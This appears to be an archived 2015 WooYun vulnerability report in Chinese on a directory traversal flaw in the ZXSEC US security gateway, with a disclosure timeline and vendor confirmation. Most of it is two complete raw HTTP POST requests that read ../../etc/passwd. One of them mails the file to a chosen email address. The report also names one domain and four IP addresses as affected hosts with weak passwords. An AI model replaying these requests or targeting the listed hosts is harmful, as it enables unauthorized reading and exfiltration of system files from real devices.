乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-13: 细节已通知厂商并且等待厂商处理中 2015-03-13: 厂商已经确认,细节仅向厂商公开 2015-03-16: 细节向第三方安全合作伙伴开放 2015-05-07: 细节向核心白帽子及相关领域专家公开 2015-05-17: 细节向普通白帽子公开 2015-05-27: 细节向实习白帽子公开 2015-06-11: 细节向公众公开
rt
ZXSEC US 统一安全网关系统由于没充分过滤用户输入的../之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。弱口令案例:
https://www.lngmxx.com/https://60.13.3.21/https://58.42.250.234/https://120.195.49.238/https://124.163.249.126/
第一处:
第二处:
一处:
POST /cgi-bin/webapp?op=_zj_mrqcfib_pbq&filename=3 HTTP/1.1Host: www.lngmxx.comConnection: keep-aliveContent-Length: 55Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: https://www.lngmxx.comUser-Agent: Opera/9.80 (Macintosh; Intel Mac OS X; U; en) Presto/2.2.15 Version/10.00Content-Type: application/x-www-form-urlencodedReferer: https://www.lngmxx.com/cgi-bin/webapp?op=_zj_mrqcfib_pelt&rname=config.cfg&fileid=3Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: SESSIONID=bfa4a2bad5a3894f020aff177266e1b1way=0&txt_sfile=../../etc/passwd&submit3=%B5%BC%B3%F6++
第二处,需配置stmp服务
POST /cgi-bin/webapp?op=_zj_jxfi_pbka_pbq HTTP/1.1Host: www.lngmxx.comConnection: keep-aliveContent-Length: 777Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: https://www.lngmxx.comUser-Agent: Opera/9.80 (Macintosh; Intel Mac OS X; U; en) Presto/2.2.15 Version/10.00Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQLDwEXGyzfjgAgLGReferer: https://www.lngmxx.com/cgi-bin/webapp?op=_zj_jxfi_pbka_peltAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: SESSIONID=bfa4a2bad5a3894f020aff177266e1b1------WebKitFormBoundaryQLDwEXGyzfjgAgLGContent-Disposition: form-data; name="receiver_address"邮箱地址@qq.com------WebKitFormBoundaryQLDwEXGyzfjgAgLGContent-Disposition: form-data; name="subject"test------WebKitFormBoundaryQLDwEXGyzfjgAgLGContent-Disposition: form-data; name="content"test------WebKitFormBoundaryQLDwEXGyzfjgAgLGContent-Disposition: form-data; name="con_num"4------WebKitFormBoundaryQLDwEXGyzfjgAgLGContent-Disposition: form-data; name="type"1------WebKitFormBoundaryQLDwEXGyzfjgAgLGContent-Disposition: form-data; name="com_filetxt"../../etc/passwd------WebKitFormBoundaryQLDwEXGyzfjgAgLGContent-Disposition: form-data; name="com_file_value"../../etc/passwd------WebKitFormBoundaryQLDwEXGyzfjgAgLG--
你们懂的。。
危害等级:高
漏洞Rank:20
确认时间:2015-03-13 20:13
感谢~
暂无